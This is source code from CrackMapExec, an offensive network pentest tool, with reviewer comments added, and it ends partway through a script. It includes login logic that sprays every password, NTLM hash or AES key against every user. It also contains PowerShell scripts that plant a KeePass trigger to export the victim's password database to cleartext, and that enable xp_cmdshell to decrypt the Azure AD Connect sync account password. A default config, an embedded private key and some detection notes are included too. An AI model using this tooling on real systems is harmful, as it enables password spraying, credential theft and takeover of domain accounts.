            owned.append(False)  # As these are likely valid we still want to test them if they are specified in the command line
            secret.append(secret_single)
            cred_type.append(cred_type_single)

        # data is never filled in this method, so it becomes one None per secret
        if len(secret) != len(data): data = [None] * len(secret)
        return domain, username, owned, secret, cred_type, data

    def parse_credentials(self):
        """
        Parse credentials from the command line or from a file specified.
        Usernames can be specified with a domain (domain\\username) or without (username).
        If the file contains domain\\username the domain specified will be overwritten by the one in the file.
        :return: domain[], username[], owned[], secret[], cred_type[], data[] (one None per secret)
        """
        domain = []
        username = []
        owned = []
        secret = []
        cred_type = []

        # Parse usernames
        for user in self.args.username:
            # An argument naming an existing file is read as a list, one entry per line.
            if isfile(user):
                with open(user, 'r') as user_file:
                    for line in user_file:
                        if "\\" in line:
                            # NOTE(review): a line with more than one backslash makes
                            # this two-name unpacking raise ValueError.
                            domain_single, username_single = line.split("\\")
                        else:
                            domain_single = self.args.domain if hasattr(self.args, "domain") and self.args.domain else self.domain
                            username_single = line
                        domain.append(domain_single)
                        username.append(username_single.strip())
                        owned.append(False)
            else:
                if "\\" in user:
                    domain_single, username_single = user.split("\\")
                else:
                    domain_single = self.args.domain if hasattr(self.args, "domain") and self.args.domain else self.domain
                    username_single = user
                domain.append(domain_single)
                username.append(username_single)
                owned.append(False)

        # Parse passwords
        for password in self.args.password:
            if isfile(password):
                with open(password, 'r') as password_file:
                    for line in password_file:
                        secret.append(line.strip())
                        cred_type.append('plaintext')
            else:
                secret.append(password)
                cred_type.append('plaintext')

        # Parse NTLM-hashes
        if hasattr(self.args, "hash") and self.args.hash:
            for ntlm_hash in self.args.hash:
                if isfile(ntlm_hash):
                    with open(ntlm_hash, 'r') as ntlm_hash_file:
                        for line in ntlm_hash_file:
                            secret.append(line.strip())
                            cred_type.append('hash')
                else:
                    secret.append(ntlm_hash)
                    cred_type.append('hash')

        # Parse AES keys
        if self.args.aesKey:
            for aesKey in self.args.aesKey:
                if isfile(aesKey):
                    with open(aesKey, 'r') as aesKey_file:
                        for line in aesKey_file:
                            secret.append(line.strip())
                            cred_type.append('aesKey')
                else:
                    secret.append(aesKey)
                    cred_type.append('aesKey')

        return domain, username, owned, secret, cred_type, [None] * len(secret)

    def try_credentials(self, domain, username, owned, secret, cred_type, data=None):
        """
        Try to login using the specified credentials and protocol.
        Possible login methods are:
        - plaintext (/kerberos)
        - NTLM-hash (/kerberos)
        - AES-key
        :return: the login method's result, or False when the attempt is skipped
        """
        # No attempt is made once a failed-login limit has been reached.
        if self.over_fail_limit(username):
            return False
        # With continue_on_success set, a user already marked as owned is skipped.
        if self.args.continue_on_success and owned:
            return False
        # Enforcing FQDN for SMB if not using local authentication. Related issues/PRs: #26, #28, #24, #38
        # NOTE(review): self.domain is initialised to None in __init__; this
        # line presumably relies on it having been set to a string before login.
        if self.args.protocol == 'smb' and not self.args.local_auth and "." not in domain and not self.args.laps and secret != "" and not (self.domain.upper() == self.hostname.upper()) :
            self.logger.error(f"Domain {domain} for user {username.rstrip()} need to be FQDN ex:domain.local, not domain")
            return False

        # sem is a single-slot semaphore, so login calls do not overlap.
        with sem:
            if cred_type == 'plaintext':
                if self.args.kerberos:
                    return self.kerberos_login(domain, username, secret, '', '', self.kdcHost, False)
                elif hasattr(self.args, "domain"):  # Some protocols don't use domain for login
                    return self.plaintext_login(domain, username, secret)
                elif self.args.protocol == 'ssh':
                    return self.plaintext_login(username, secret, data)
                else:
                    return self.plaintext_login(username, secret)
            elif cred_type == 'hash':
                if self.args.kerberos:
                    return self.kerberos_login(domain, username, '', secret, '', self.kdcHost, False)
                return self.hash_login(domain, username, secret)
            elif cred_type == 'aesKey':
                return self.kerberos_login(domain, username, '', '', secret, self.kdcHost, False)

    def login(self):
        """
        Try to login using the credentials specified in the command line or in the database.
        :return: True if the login was successful and "--continue-on-success" was not specified;
            False when the username and secret counts differ in no-bruteforce mode; otherwise None.
        """
        # domain[n] always corresponds to username[n] and owned [n]
        domain = []
        username = []
        owned = []  # Determines whether we have found a valid credential for this user. Default: False
        # secret[n] always corresponds to cred_type[n]
        secret = []
        cred_type = []
        data = []  # Arbitrary data needed for the login, e.g. ssh_key

        if self.args.cred_id:
            db_domain, db_username, db_owned, db_secret, db_cred_type, db_data = self.query_db_creds()
            domain.extend(db_domain)
            username.extend(db_username)
            owned.extend(db_owned)
            secret.extend(db_secret)
            cred_type.extend(db_cred_type)
            data.extend(db_data)

        if self.args.username:
            parsed_domain, parsed_username, parsed_owned, parsed_secret, parsed_cred_type, parsed_data = self.parse_credentials()
            domain.extend(parsed_domain)
            username.extend(parsed_username)
            owned.extend(parsed_owned)
            secret.extend(parsed_secret)
            cred_type.extend(parsed_cred_type)
            data.extend(parsed_data)

        if self.args.use_kcache:
            with sem:
                username = self.args.username[0] if len(self.args.username) else ""
                password = self.args.password[0] if len(self.args.password) else ""
                # NOTE(review): the result of kerberos_login() is not checked;
                # success is logged and True returned whatever it returns.
                self.kerberos_login(self.domain, username, password, "", "", self.kdcHost, True)
                self.logger.info("Successfully authenticated using Kerberos cache")
                return True

        if not self.args.no_bruteforce:
            # Every secret is tried against every username.
            for secr_index, secr in enumerate(secret):
                for user_index, user in enumerate(username):
                    if self.try_credentials(domain[user_index], user, owned[user_index], secr, cred_type[secr_index], data[secr_index]):
                        owned[user_index] = True
                        if not self.args.continue_on_success:
                            return True
        else:
            # username[n] is paired with secret[n] only.
            if len(username) != len(secret):
                self.logger.error("Number provided of usernames and passwords/hashes do not match!")
                return False
            for user_index, user in enumerate(username):
                if self.try_credentials(domain[user_index], user, owned[user_index], secret[user_index], cred_type[user_index], data[user_index]) and not self.args.continue_on_success:
                    owned[user_index] = True
                    if not self.args.continue_on_success:
                        return True

    def mark_pwned(self):
        """Return the highlighted ``(pwned_label)`` marker when admin_privs is set, else highlight of an empty string."""
        return highlight(f"({pwned_label})" if self.admin_privs else "")
================================================
FILE: cme/console.py
================================================
from rich.console import Console
# Shared rich Console instance; crackmapexec.py passes it to its Progress bar.
cme_console = Console(soft_wrap=True, tab_size=4)
================================================
FILE: cme/context.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import configparser
import os
class Context:
    """Bundle of state handed to modules: CLI arguments, database, logger and config.

    Every attribute of *args* is copied onto the instance first; ``db``,
    ``log_folder_path``, ``localip``, ``conf`` and ``log`` are set afterwards
    and therefore replace same-named attributes coming from *args*.
    """

    def __init__(self, db, logger, args):
        for name, setting in vars(args).items():
            setattr(self, name, setting)

        cme_home = os.path.expanduser("~/.cme")

        self.db = db
        self.log_folder_path = os.path.join(cme_home, "logs")
        self.localip = None

        # A missing config file is not an error: ConfigParser.read() skips it.
        parser = configparser.ConfigParser()
        parser.read(os.path.expanduser("~/.cme/cme.conf"))
        self.conf = parser

        self.log = logger
        # self.log.debug = logging.debug
================================================
FILE: cme/crackmapexec.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from cme.helpers.logger import highlight
from cme.helpers.misc import identify_target_file
from cme.parsers.ip import parse_targets
from cme.parsers.nmap import parse_nmap_xml
from cme.parsers.nessus import parse_nessus_file
from cme.cli import gen_cli_args
from cme.loaders.protocolloader import ProtocolLoader
from cme.loaders.moduleloader import ModuleLoader
from cme.servers.http import CMEServer
from cme.first_run import first_run_setup
from cme.context import Context
from cme.paths import CME_PATH, DATA_PATH
from cme.console import cme_console
from cme.logger import cme_logger
from cme.config import cme_config, cme_workspace, config_log, ignore_opsec
from concurrent.futures import ThreadPoolExecutor, as_completed
import asyncio
import cme.helpers.powershell as powershell
import shutil
import webbrowser
import random
import os
from os.path import exists
from os.path import join as path_join
from sys import exit
import logging
import sqlalchemy
from rich.progress import Progress
from sys import platform
# Increase file_limit to prevent error "Too many open files"
# The soft limit on open file descriptors is raised to the hard limit,
# capped at 10000; the hard limit itself is left as it is.
if platform != "win32":
    import resource

    hard_cap = resource.getrlimit(resource.RLIMIT_NOFILE)[1]
    file_limit = (min(hard_cap, 10000), hard_cap)
    resource.setrlimit(resource.RLIMIT_NOFILE, file_limit)

# Import probe: any failure while importing librlers is reported as an
# interpreter-version mismatch and ends the program.
# NOTE(review): the bare except also catches unrelated errors (and Ctrl-C)
# raised during the import, so the message can be misleading.
try:
    import librlers
except:
    print("Incompatible python version, try with another python version or another binary 3.8 / 3.9 / 3.10 / 3.11 that match your python version (python -V)")
    exit(1)
def create_db_engine(db_path):
    """Return a SQLAlchemy engine for the SQLite file at *db_path*.

    The engine is created with ``isolation_level="AUTOCOMMIT"`` and
    ``future=True``.
    """
    return sqlalchemy.create_engine(
        f"sqlite:///{db_path}",
        isolation_level="AUTOCOMMIT",
        future=True,
    )
async def start_run(protocol_obj, args, db, targets):
    """Run *protocol_obj* against every target on a thread pool.

    One call ``protocol_obj(args, db, target)`` is submitted per target to a
    pool of ``args.threads + 1`` workers. A progress bar is shown unless
    ``args.no_progress`` is set or there is exactly one target. The function
    returns once the pool has shut down, i.e. after all submitted calls ended.
    """
    cme_logger.debug(f"Creating ThreadPoolExecutor")
    worker_count = args.threads + 1

    if args.no_progress or len(targets) == 1:
        with ThreadPoolExecutor(max_workers=worker_count) as executor:
            cme_logger.debug(f"Creating thread for {protocol_obj}")
            # NOTE(review): the futures are dropped, so an exception raised
            # inside a worker call is never retrieved or reported here.
            for target in targets:
                executor.submit(protocol_obj, args, db, target)
        return

    with Progress(console=cme_console) as progress, ThreadPoolExecutor(max_workers=worker_count) as executor:
        total = len(targets)
        tasks = progress.add_task(
            f"[green]Running CME against {total} {'target' if total == 1 else 'targets'}",
            total=total,
        )
        cme_logger.debug(f"Creating thread for {protocol_obj}")
        futures = [executor.submit(protocol_obj, args, db, target) for target in targets]
        # Advance the bar as each call finishes; results are not inspected.
        for current, _ in enumerate(as_completed(futures), start=1):
            progress.update(tasks, completed=current)
def main():
first_run_setup(cme_logger)
root_logger = logging.getLogger("root")
args = gen_cli_args()
if args.verbose:
cme_logger.logger.setLevel(logging.INFO)
root_logger.setLevel(logging.INFO)
elif args.debug:
cme_logger.logger.setLevel(logging.DEBUG)
root_logger.setLevel(logging.DEBUG)
else:
cme_logger.logger.setLevel(logging.ERROR)
root_logger.setLevel(logging.ERROR)
# if these are the same, it might double log to file (two FileHandlers will be added)
# but this should never happen by accident
if config_log:
cme_logger.add_file_log()
if hasattr(args, "log") and args.log:
cme_logger.add_file_log(args.log)
cme_logger.debug(f"Passed args: {args}")
# FROM HERE ON A PROTOCOL IS REQUIRED
if not args.protocol:
exit(1)
if args.protocol == "ssh":
if args.key_file:
if not args.password:
cme_logger.fail(f"Password is required, even if a key file is used - if no passphrase for key, use `-p ''`")
exit(1)
if args.use_kcache and not os.environ.get("KRB5CCNAME"):
cme_logger.error("KRB5CCNAME environment variable is not set")
exit(1)
module_server = None
targets = []
server_port_dict = {"http": 80, "https": 443, "smb": 445}
if hasattr(args, "cred_id") and args.cred_id:
for cred_id in args.cred_id:
if "-" in str(cred_id):
start_id, end_id = cred_id.split("-")
try:
for n in range(int(start_id), int(end_id) + 1):
args.cred_id.append(n)
args.cred_id.remove(cred_id)
except Exception as e:
cme_logger.error(f"Error parsing database credential id: {e}")
exit(1)
if hasattr(args, "target") and args.target:
for target in args.target:
if exists(target) and os.path.isfile(target):
target_file_type = identify_target_file(target)
if target_file_type == "nmap":
targets.extend(parse_nmap_xml(target, args.protocol))
elif target_file_type == "nessus":
targets.extend(parse_nessus_file(target, args.protocol))
else:
with open(target, "r") as target_file:
for target_entry in target_file:
targets.extend(parse_targets(target_entry.strip()))
else:
targets.extend(parse_targets(target))
# The following is a quick hack for the powershell obfuscation functionality, I know this is yucky
if hasattr(args, "clear_obfscripts") and args.clear_obfscripts:
shutil.rmtree(os.path.expanduser("~/.cme/obfuscated_scripts/"))
os.mkdir(os.path.expanduser("~/.cme/obfuscated_scripts/"))
cme_logger.success("Cleared cached obfuscated PowerShell scripts")
if hasattr(args, "obfs") and args.obfs:
powershell.obfuscate_ps_scripts = True
cme_logger.debug(f"Protocol: {args.protocol}")
p_loader = ProtocolLoader()
protocol_path = p_loader.get_protocols()[args.protocol]["path"]
cme_logger.debug(f"Protocol Path: {protocol_path}")
protocol_db_path = p_loader.get_protocols()[args.protocol]["dbpath"]
cme_logger.debug(f"Protocol DB Path: {protocol_db_path}")
protocol_object = getattr(p_loader.load_protocol(protocol_path), args.protocol)
cme_logger.debug(f"Protocol Object: {protocol_object}")
protocol_db_object = getattr(p_loader.load_protocol(protocol_db_path), "database")
cme_logger.debug(f"Protocol DB Object: {protocol_db_object}")
db_path = path_join(CME_PATH, "workspaces", cme_workspace, f"{args.protocol}.db")
cme_logger.debug(f"DB Path: {db_path}")
db_engine = create_db_engine(db_path)
db = protocol_db_object(db_engine)
# with the new cme/config.py this can be eventually removed, as it can be imported anywhere
setattr(protocol_object, "config", cme_config)
if args.module or args.list_modules:
loader = ModuleLoader(args, db, cme_logger)
modules = loader.list_modules()
if args.list_modules:
for name, props in sorted(modules.items()):
if args.protocol in props["supported_protocols"]:
cme_logger.display(f"{name:<25} {props['description']}")
exit(0)
elif args.module and args.show_module_options:
for module in args.module:
cme_logger.display(f"{module} module options:\n{modules[module]['options']}")
exit(0)
elif args.module:
cme_logger.debug(f"Modules to be Loaded: {args.module}, {type(args.module)}")
for m in map(str.lower, args.module):
if m not in modules:
cme_logger.error(f"Module not found: {m}")
exit(1)
cme_logger.debug(f"Loading module {m} at path {modules[m]['path']}")
module = loader.init_module(modules[m]["path"])
if not module.opsec_safe:
if ignore_opsec:
cme_logger.debug(f"ignore_opsec is set in the configuration, skipping prompt")
cme_logger.display(f"Ignore OPSEC in configuration is set and OPSEC unsafe module loaded")
else:
ans = input(
highlight(
"[!] Module is not opsec safe, are you sure you want to run this? [Y/n] For global configuration, change ignore_opsec value to True on ~/cme/cme.conf",
"red",
)
)
if ans.lower() not in ["y", "yes", ""]:
exit(1)
if not module.multiple_hosts and len(targets) > 1:
ans = input(
highlight(
"[!] Running this module on multiple hosts doesn't really make any sense, are you sure you want to continue? [Y/n] ",
"red",
)
)
if ans.lower() not in ["y", "yes", ""]:
exit(1)
if hasattr(module, "on_request") or hasattr(module, "has_response"):
if hasattr(module, "required_server"):
args.server = module.required_server
if not args.server_port:
args.server_port = server_port_dict[args.server]
# loading a module server multiple times will obviously fail
try:
context = Context(db, cme_logger, args)
module_server = CMEServer(
module,
context,
cme_logger,
args.server_host,
args.server_port,
args.server,
)
module_server.start()
protocol_object.server = module_server.server
except Exception as e:
cme_logger.error(f"Error loading module server for {module}: {e}")
cme_logger.debug(f"proto_object: {protocol_object}, type: {type(protocol_object)}")
cme_logger.debug(f"proto object dir: {dir(protocol_object)}")
# get currently set modules, otherwise default to empty list
current_modules = getattr(protocol_object, "module", [])
current_modules.append(module)
setattr(protocol_object, "module", current_modules)
cme_logger.debug(f"proto object module after adding: {protocol_object.module}")
if hasattr(args, "ntds") and args.ntds and not args.userntds:
ans = input(
highlight(
"[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user <user> to dump a specific user safely or the module -M ntdsutil [Y/n] ",
"red",
)
)
if ans.lower() not in ["y", "yes", ""]:
exit(1)
try:
asyncio.run(start_run(protocol_object, args, db, targets))
except KeyboardInterrupt:
cme_logger.debug("Got keyboard interrupt")
finally:
if module_server:
module_server.shutdown()
db_engine.dispose()
# Script entry point: run the CLI only when this file is executed directly,
# not when it is imported by another module.
if __name__ == "__main__":
    main()
================================================
FILE: cme/data/cme.conf
================================================
# Default configuration; first_run.py copies this file into the user's CME directory
# when no configuration file exists there yet.
# NOTE(review): the copy keeps service passwords in clear text, so the per-user
# configuration file should be readable by its owner only.
[CME]
workspace = default
last_used_db = smb
pwn3d_label = Pwn3d!
audit_mode =
reveal_chars_of_pwd = 0
log_mode = False
# True skips the interactive confirmation that is otherwise shown before a module
# flagged as not OPSEC safe is loaded. Set to False to get the prompt back.
ignore_opsec = True
host_info_colors = ["green", "red", "yellow", "cyan"]
# Neo4j instance behind BloodHound (bolt://bh_uri:bh_port). neo4j/neo4j is the stock
# Neo4j login; replace it with the credentials of your own instance.
[BloodHound]
bh_enabled = False
bh_uri = 127.0.0.1
bh_port = 7687
bh_user = neo4j
bh_pass = neo4j
# Placeholder login for a local Empire API; replace before use.
[Empire]
api_host = 127.0.0.1
api_port = 1337
username = empireadmin
password = password123
# Placeholder password for a local Metasploit RPC service; replace before use.
[Metasploit]
rpc_host = 127.0.0.1
rpc_port = 55552
password = abc123
================================================
FILE: cme/data/default.pem
================================================
-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDLRxCDVVXmjcFW
rvuwIZh6ywLNtffsTFQ2QAykUTl6CGzn+rpoz/s/AX7s2/dWkv+pcUULNNeH2Ae9
YNhM7vQqDzKA4Rj1FzVO9LIQot3F32e9SQWk2zJ0dia3uaxrrZTQeLOpISa9g3Q0
nnvflX2KjarZ/OUrxSJA3HRgx0C0N7bmyC/jXSeM8cLQxJjIdNpxeMfSA5koeEEJ
hzaWZLgtJpX5NOxpeJBRfhPSOL3r2t2qUGnzctvHbPZmdyRwIRCAiJNSHZd+CirC
ayplzdaxDZ0rlMcpaeodOTpusBLmAWEP6uQEKrRBgL+AVOo7DpncIbmMQPkSA3La
Slyh+dgRAgMBAAECggEBAJW58l/KK0t2fkHrAVfqZvWLMrVyovpZ/m03IBin+z33
lsAH3eX1y4nNAEBWhQgvnkCgPcrTUS2t4YWMH8YK+60/JGPpaQid35YYhk/app9o
vnCdqJqVGcTOghYxnN5zLHmhbjPVR0Ov35giY/t7kMzNLFsD+4kR2vkLaG0gVnhm
gAZ0M7bN35LQT0Wk1SFjVPLwdsPb/Jvxo7ly7wVv7Y2D1vNCYoBQGoFL7/noGene
mMQ+OVawP58KqoYn/WRLI9zmTWzohXvYJYvm+SiXultB4aBGgp4saYjD8gwSOBml
wbz2LyRCcDVi46yDcy7iSLmMr6c4ZdkUpxRvtPJI5wECgYEA+AgBrSdOoU+pzPas
HlrprQEn5XHn990wfJj5N77MtpJu7Gmf/0tWGQQ3wohmu8dfNZrE8ZsEupRUVIYh
5mLOWMmujkjNpp6A5LzZcp3hnLklORoUirZka66QgC9RSYv08PlPLy7ru+aHYsg1
uPZNcf+KgpQoCg10LFrXaCh8GlUCgYEA0c74b1Rxg2+Dr3pGfvoZcQhtg1FUOWR9
poNFkkV7vAnzoR9xLDvRtsOcGL7fu/WDtBg/XsddzfaKtU2cE05cF888OV+TYs6U
Cturp+pz+Yyslh6x3AgygnpMGJp6rk5D9LLHmIWPpCPjbBSofEQL9IxKoQOYOlvm
7VrBu7Kbus0CgYAD6NRl702s+z147pZt8A7o3DDNzArU/FaMUDj1aPt/ETXQYiXU
d1KHGGrslQvRf+X/SU47ZK8hZb8iie602+/WtG8c7QbYznzHnjZrORPaTYzJpqCW
QyO4EstSSeylFSCqP7PA0aODlbGim/dE0BUOa/G59y3eYrHnFRN6H9E89QKBgHHK
+JGhUiPAYsLU5dFOomfc81Cq1qx+JWwffKdVykN1fk7gN8iO9TJUK6B8Peq6wWD3
Wb91EBp6YkbtPf52nJpJStevT8fiVQcCl7pt/dLWinCtWzgEtihwXj9l4a4SQuc/
4+OEZSDYWiuvlKY5XeaYBI4J3hGg8MHBXJwJxk7tAoGBALBrop1vJVxZt4+Eb9gv
cc5ZRtDi79MXPePDinhRivVi/48LsYoFXRtodjcAMWqAyH7n17Kxkvl1rRsaNAq/
H4F0kXuTXReV3LtZmZTLXmju2spGz3e3yKqgB+7dWUauqK44WaO1rYz32hTxLxil
kN8k77KmfNkqz+9WY6S4CqIh
-----END PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIC+zCCAeOgAwIBAgIUPjiFj6PH8T2dFrcwoqL7bHkXKfQwDQYJKoZIhvcNAQEL
BQAwDTELMAkGA1UEBhMCVVMwHhcNMjAwNTEwMTAyMzA5WhcNMjEwNTEwMTAyMzA5
WjANMQswCQYDVQQGEwJVUzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
AMtHEINVVeaNwVau+7AhmHrLAs219+xMVDZADKRROXoIbOf6umjP+z8Bfuzb91aS
/6lxRQs014fYB71g2Ezu9CoPMoDhGPUXNU70shCi3cXfZ71JBaTbMnR2Jre5rGut
lNB4s6khJr2DdDSee9+VfYqNqtn85SvFIkDcdGDHQLQ3tubIL+NdJ4zxwtDEmMh0
2nF4x9IDmSh4QQmHNpZkuC0mlfk07Gl4kFF+E9I4veva3apQafNy28ds9mZ3JHAh
EICIk1Idl34KKsJrKmXN1rENnSuUxylp6h05Om6wEuYBYQ/q5AQqtEGAv4BU6jsO
mdwhuYxA+RIDctpKXKH52BECAwEAAaNTMFEwHQYDVR0OBBYEFO+GlEFEBLb5Rv8x
bx/bsBBNgwSxMB8GA1UdIwQYMBaAFO+GlEFEBLb5Rv8xbx/bsBBNgwSxMA8GA1Ud
EwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEBAHU17UUlL2rl+xLdBDRqcVBb
DUWwvmkBL22G05LcIIjlA7YeeKHBA0D6ppulTZ+HWZ2mo2n10bIso+SryytGrU0g
p9Rt+mUDiWOQJWi0W6VAhK72wsJG5DnRdf5yXjbsY065iA4Q5UfhQd7TsR3q4EkD
5ziOrKiuB5T3PR48aE/Cpg0aTGpx05OEVG6un1xwUpT6d6j5qP2IELaCG446ZZIO
0BrvUoOTwYCV6UhhV1F3xirVFpUwTtp8Ms/fst4vSX9/6PgyBd09icB+O8t9LhXG
b6FMHKpKOOkRQztqJR3ipMlW6Ceslwqs5CBRowbySi3C4kpEplM6hbVTelzwP6U=
-----END CERTIFICATE-----
================================================
FILE: cme/data/keepass_trigger_module/AddKeePassTrigger.ps1
================================================
# Template script: the REPLACE_ME_* values are placeholders substituted before the script runs.
# Effect: appends one <Trigger> element to the KeePass configuration XML at $KeePassXMLPath.
# The trigger's action carries the parameters "$ExportPath\$ExportName" and "KeePass XML (2.x)".
# NOTE(review): the two TypeGuid values are opaque here; presumably the "opened database file"
# event and the "export active database" action. Confirm against the KeePass trigger documentation.
# Detection: a <Trigger> entry the user did not create, or a write to the KeePass configuration
# file by a process other than KeePass, is the artifact this script leaves behind.
$ExportPath = "REPLACE_ME_ExportPath"
$ExportName = "REPLACE_ME_ExportName"
$TriggerName = "REPLACE_ME_TriggerName"
$KeePassXMLPath = "REPLACE_ME_KeePassXMLPath"
# Trigger definition; a fresh random GUID is generated for every run.
$TriggerXML = [xml] @"
<Trigger>
<Guid>$([Convert]::ToBase64String([System.GUID]::NewGuid().ToByteArray()))</Guid>
<Name>$TriggerName</Name>
<TurnOffAfterAction>true</TurnOffAfterAction>
<Events>
<Event>
<TypeGuid>bES7XfGLTA2IzmXm6a0pig==</TypeGuid>
<Parameters>
<Parameter>1</Parameter>
<Parameter>False</Parameter>
</Parameters>
</Event>
</Events>
<Conditions />
<Actions>
<Action>
<TypeGuid>D5prW87VRr65NO2xP5RIIg==</TypeGuid>
<Parameters>
<Parameter>$ExportPath\$ExportName</Parameter>
<Parameter>KeePass XML (2.x)</Parameter>
<Parameter />
<Parameter />
</Parameters>
</Action>
</Actions>
</Trigger>
"@
# Only act when the path ends in .xml and the file exists.
if($KeePassXMLPath -and ($KeePassXMLPath -match '.\.xml$') -and (Test-Path -Path $KeePassXMLPath) ) {
$KeePassXMLPath = Resolve-Path -Path $KeePassXMLPath
$KeePassXML = [xml](Get-Content -Path $KeePassXMLPath)
# When Triggers comes back as a string (presumably an empty <Triggers /> element), a new
# <Triggers> element holding the trigger replaces it; otherwise the trigger is appended.
if ($KeePassXML.Configuration.Application.TriggerSystem.Triggers -is [String]) {
$Triggers = $KeePassXML.CreateElement('Triggers')
$Null = $Triggers.AppendChild($KeePassXML.ImportNode($TriggerXML.Trigger, $True))
$Null = $KeePassXML.Configuration.Application.TriggerSystem.ReplaceChild($Triggers, $KeePassXML.Configuration.Application.TriggerSystem.SelectSingleNode('Triggers'))
}
else {
$Null = $KeePassXML.Configuration.Application.TriggerSystem.Triggers.AppendChild($KeePassXML.ImportNode($TriggerXML.Trigger, $True))
}
# The configuration file is overwritten in place.
$KeePassXML.Save($KeePassXMLPath)
}
================================================
FILE: cme/data/keepass_trigger_module/RemoveKeePassTrigger.ps1
================================================
# Template script: the REPLACE_ME_* values are placeholders substituted before the script runs.
# Effect: removes every <Trigger> whose Name matches $TriggerName from the KeePass configuration
# XML at $KeePassXMLPath and saves the file in place.
$KeePassXMLPath = "REPLACE_ME_KeePassXMLPath"
$TriggerName = "REPLACE_ME_TriggerName"
# Only act when the path ends in .xml and the file exists.
if($KeePassXMLPath -and ($KeePassXMLPath -match '.\.xml$') -and (Test-Path -Path $KeePassXMLPath) ) {
$KeePassXMLPath = Resolve-Path -Path $KeePassXMLPath
$KeePassXML = [xml](Get-Content -Path $KeePassXMLPath)
# NOTE(review): $RandomGUID is assigned but never read in this script.
$RandomGUID = [System.GUID]::NewGuid().ToByteArray()
# A string-typed Triggers value means there is no trigger list to walk, so nothing is removed.
if ($KeePassXML.Configuration.Application.TriggerSystem.Triggers -isnot [String]) {
# -like is used, so wildcard characters in $TriggerName match more than one trigger.
$Children = $KeePassXML.Configuration.Application.TriggerSystem.Triggers | ForEach-Object {$_.Trigger} | Where-Object {$_.Name -like $TriggerName}
ForEach($Child in $Children) {
$KeePassXML.Configuration.Application.TriggerSystem.Triggers.RemoveChild($Child)
}
}
# A failed save is swallowed silently; the caller gets no signal that the trigger is still there.
try {
$KeePassXML.Save($KeePassXMLPath)
}
catch {
}
}
================================================
FILE: cme/data/keepass_trigger_module/RestartKeePass.ps1
================================================
# Template script: the REPLACE_ME_* values are placeholders substituted before the script runs.
# Effect: restarts KeePass for $KeePassUser. It registers a logon-triggered task that launches
# $KeePassBinaryPath as that user, force-kills that user's keepass.exe, starts the task by hand,
# waits three seconds and deletes the task again.
# Detection: a scheduled task that is created, run and deleted within a few seconds (Security
# events 4698/4699 when scheduled-task auditing is enabled), next to a forced termination of
# keepass.exe.
$KeePassUser = "REPLACE_ME_KeePassUser"
$KeePassBinaryPath = "REPLACE_ME_KeePassBinaryPath"
$DummyServiceName = "REPLACE_ME_DummyServiceName"
# /it runs the task only in the user's interactive session.
schtasks /create /tn "$DummyServiceName" /tr "$KeePassBinaryPath" /ru $KeePassUser /it /sc ONLOGON
# /F forces termination and /T includes child processes; the filter limits it to this user.
taskkill /F /T /IM keepass.exe /FI "USERNAME eq $KeePassUser"
schtasks /run /tn "$DummyServiceName"
Start-Sleep -s 3
schtasks /delete /tn "$DummyServiceName" /F
================================================
FILE: cme/data/msol_dump/msol_dump.ps1
================================================
# Reads the Azure AD Connect (ADSync) LocalDB on the host it runs on and prints the domain,
# user name and decrypted password of the AD management agent account.
# Stages: locate sqllocaldb.exe, connect to the ADSync database, read the keyset identifiers and
# the encrypted agent configuration, then decrypt through xp_cmdshell with mcrypt.dll.
# Detection: xp_cmdshell being switched on through sp_configure on the ADSync instance,
# powershell.exe spawned by the SQL Server process, and mcrypt.dll loaded outside the sync service.
# NOTE(review): nothing in this script switches xp_cmdshell back off, so the configuration
# change remains after it has run.
$sqlbin=@(Get-ChildItem -Path C:\"Program Files"\"Microsoft SQL Server"\ -Filter sqllocaldb.exe -Recurse).fullname
# Instance name is taken from the "sqllocaldb info" output line containing "ADSy".
$db=@(cmd /c $sqlbin info | findstr /i ADSy)
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\$db;Initial Catalog=ADSync"
try {
$client.Open()
} catch {
Write-Host "[!] Could not connect to localdb..."
return
}
Write-Host "[*] Querying ADSync localdb (mms_server_configuration)"
# Keyset id, instance id and entropy are the inputs to LoadKeySet further down.
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
if ($reader.Read() -ne $true) {
Write-Host "[!] Error querying mms_server_configuration"
return
}
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)
$reader.Close()
Write-Host "[*] Querying ADSync localdb (mms_management_agent)"
# Plain and encrypted configuration of the management agent whose ma_type is 'AD'.
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
if ($reader.Read() -ne $true) {
Write-Host "[!] Error querying mms_management_agent"
return
}
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()
Write-Host "[*] Using xp_cmdshell to run some Powershell as the service user"
# Enables 'show advanced options' and 'xp_cmdshell', then runs powershell.exe through
# xp_cmdshell. Values read from the database are interpolated into the command text.
$cmd = $client.CreateCommand()
$cmd.CommandText = "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'powershell.exe -c `"add-type -path ''C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'';`$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager;`$km.LoadKeySet([guid]''$entropy'', [guid]''$instance_id'', $key_id);`$key = `$null;`$km.GetActiveCredentialKey([ref]`$key);`$key2 = `$null;`$km.GetKey(1, [ref]`$key2);`$decrypted = `$null;`$key2.DecryptBase64ToString(''$crypted'', [ref]`$decrypted);Write-Host `$decrypted`"'"
$reader = $cmd.ExecuteReader()
# xp_cmdshell returns its output one row per line; rows are concatenated until a NULL row.
$decrypted = [string]::Empty
while ($reader.Read() -eq $true -and $reader.IsDBNull(0) -eq $false) {
$decrypted += $reader.GetString(0)
}
if ($decrypted -eq [string]::Empty) {
